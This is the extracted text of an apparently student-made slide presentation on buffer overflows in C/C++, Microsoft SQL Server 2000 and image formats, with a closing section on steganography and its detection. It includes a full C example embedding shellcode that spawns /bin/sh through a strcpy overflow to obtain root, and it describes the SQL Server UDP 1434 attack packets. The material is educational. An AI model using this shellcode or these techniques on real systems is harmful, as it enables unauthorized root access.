BUFFER OVERFLOW: A SHORT STUDY
Jonathan HutchisonRobert Lee
Connor MahoneyCaleb Wherry
Overview
Buffer OverflowsC/C++SQLImages
SteganogrophyTraditionalDigital
Basic Concepts
Buffer Stack Memory Heap Memory Buffer Overflow C/C++ SQL Steganogrophy
C/C++ Buffer Overflow Vulnerabilities
C/C++ On Older Linux Machines Easiest to exploit. Few protections against segmentation faults. Many simple programs can cause serious
damage on these machines. Code Libraries
Not trusted libraries. Unstable functions. Unsecured error checking.
C/C++ Buffer Overflow Vulnerabilities (cont.)
Exploitation Using Shell Code Shell Code Unstable C commands
C Example: Use of shell code to switch the user to “root” Use of “strcpy()” function in C to cause a
buffer overflow. Dangerous for someone running an unsecured
Linux machine.
#include <stdio.h>#include <string.h>char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; // Shell code that will be executed once the buffer is
// over flown. It allows us to change the stance of our // login to “root”.
char large_string[128];int main(int argc, char *argv[]) { char buffer[96]; // buffer to overflow int i; long *long_ptr = (long *)large_string; for (i = 0; i < 32; i++) // These for loops take the shell code and
// translate it into the large string and then // in turn puts a full buffer into
each // pointer value of the large_string
*(long_ptr + i) = (int)buffer;for (i = 0; i < (int)strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer, large_string); // The string copy function in C should be used
// with the utmost caution. This is where the code // blows up and causes the program to execute
the // rest of the shell code on the command line.
return 0;}
Prevention of Buffer Overflow In C/C++
Use only trusted libraries when writing code.
Use updated software that helps prevent overflow.
Make sure your code checks the user input.
Use trusted programs, don’t use untested software.
Prevention of Buffer Overflow In C/C++ (cont.)
Administrative Point of View Don’t compromise quality for quantity. Don’t rush deadlines. Make sure your programmers are happy and
comfortable. Working conditions matter. Error checking for all inputs is a must. Don’t cut corners. Use software such as Flawfinder and Viega’s
RATS for possible code problems.
Buffer Overflow In SQL
SQL – Structured Query Language Popular query language for relational database
management.
In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.
Both Stack based and Heap based attacks.
Attacks carried out through UDP port 1434 SQL Monitor Port Commonly used by legitimate clients attempting
to connect. Single byte packet, set to 0x02
Stack Based Buffer Overflow Attack
First byte set to 0x04
Instructs SQL monitor to open registry key
If followed by a large number of bytes, stack based buffer is overflowed.
Return address overwritten
Redirects SQL server process to execute code of attackers choice.
Heap Based Buffer Overflow Attack
Carried out using similar technique First byte set to 0x08 followed by a message
with a certain format. Formatted properly, attack avoids access
violation errors before heap is overflowed.
Vulnerability in SQL server 2000 code Return values not validated Unhandled exceptions Current process fails, resulting effectively in a
denial of service attack.
Buffer Overflow In Images
iPhonewww.jailbreakme.comAlter file header in TIFF imageNew memory pointerCrashes browserUnlocks file system
Other exploits
Windows JPEG (GDI+ API) BMP GIF
Linux PNG
Macintosh, iPhone, & PSP TIFF
Traditional Stegenogrophy
Image from a laser printer under 10x magnification
Traditional Steganogrophy (cont)
Digital Steganogrophy
How it works Each pixel has 24 bits for 3 colors (255
shades/color) Change 1 or 2 color bits every pixel Adds up quickly Bits can be encoded & decoded with a
program No quality or size difference
Images Video Audio
Detection and Prevention
Compare with an original by checksum
Check same color pixels for different values
Statistical analysis
Algorithm detection
Compression & formatting
Example
Original imageHidden image